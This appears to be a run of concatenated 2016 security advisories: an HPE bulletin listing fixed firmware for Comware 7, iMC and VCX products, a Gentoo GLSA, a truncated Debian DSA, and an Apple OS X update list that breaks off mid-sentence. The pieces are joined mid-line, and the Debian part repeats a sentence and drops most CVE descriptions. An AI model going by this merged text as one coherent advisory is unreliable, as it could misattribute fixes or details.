=================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2105\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2106\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2107\n 3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n CVE-2016-2108\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-2109\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-2176\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities in the Comware 7, iMC and VCX products running OpenSSL. \n\n**COMWARE 7 Products**\n\n + 12500 (Comware 7) - Version: R7377P02\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 10500 (Comware 7) - Version: R7184\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5900/5920 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR1000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR2000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR3000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR4000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + VSR (Comware 7) - Version: E0324\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7900 (Comware 7) - Version: R2152\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130 (Comware 7) - Version: R3115\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6125XLG - Version: R2422P02\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6127XLG - Version: R2422P02\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + Moonshot - Version: R2432\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5700 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5930 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 1950 (Comware 7) - Version: R3115\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7500 (Comware 7) - Version: R7184\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5510HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5940 - Version: R2509\n * HP Network Products\n - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch\n - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch\n - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch\n - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch\n - JH396A HPE FlexFabric 5940 32QSFP+ Switch\n - JH397A HPE FlexFabric 5940 2-slot Switch\n - JH398A HPE FlexFabric 5940 4-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5950 - Version: R6123\n * HP Network Products\n - JH321A HPE FlexFabric 5950 32QSFP28 Switch\n - JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch\n - JH404A HPE FlexFabric 5950 4-slot Switch\n + 12900E (Comware 7) - Version: R2609\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**iMC Products**\n\n + iNode PC 7.2 (E0410) - Version: 7.2 E0410\n * HP Network Products\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n + iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409\n * HP Network Products\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**VCX Products**\n\n + VCX - Version: 9.8.19\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 2 June 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQEcBAEBCAAGBQJZNbF9AAoJELXhAxt7SZaiCmsH/373hRDLNeYxIUxMYvltF6m4\nB8gU5WH4mos1K7St+PHPsGdDNop/MxjtLHFEyDkweGUIycA3saZzvf5v8T5BfY3Y\nssa38vZUde1mC8RfIUKAcwo0xLqniZ5BU1fpG3bs+8qVafA7gr0i7mMvK+1M19cv\ndTkbirrP7fQ+2HGNpV3fQlvN3nz0KWI8OWBfFyWtWnYvt1rrzPJyWk08iMsFWUwC\ngYzNV38AzPPHcB7UeTnbOegL+nC3kM3VkDzhhs2pL15/ZRSlAv6I1tgcuA6YRVhQ\nwMFX9+LdSuLtDA2idUGgRhTe7lyNApUN0LRJ3nPzIcYXTlRYg3m5fkfmu1Q5KdM=\n=xlHZ\n-----END PGP SIGNATURE-----\n. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nBackground\n==========\n\nOpenSSL is an Open Source toolkit implementing the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general\npurpose cryptography library. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2j \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. Additionally, a time based side-channel\nattack may allow a local attacker to recover a private DSA key. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3566-1 security@debian.org\nhttps://www.debian.org/security/ Alessandro Ghedini\nMay 03, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 \n CVE-2016-2109 CVE-2016-2176\n\nSeveral vulnerabilities were discovered in OpenSSL, a Secure Socket Layer\ntoolkit. This could lead to a heap corruption. \n This could lead to a heap corruption. \n\nCVE-2016-2107\n\n Juraj Somorovsky discovered a padding oracle in the AES CBC cipher\n implementation based on the AES-NI instruction set. This could allow\n an attacker to decrypt TLS traffic encrypted with one of the cipher\n suites based on AES CBC. \n\nCVE-2016-2108\n\n David Benjamin from Google discovered that two separate bugs in the\n ASN.1 encoder, related to handling of negative zero integer values\n and large universal tags, could lead to an out-of-bounds write. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2h-1. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the following:\n\napache_mod_php\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to view sensitive user information\nDescription: A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to elevate privileges\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription: User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A use-after-free was addressed through 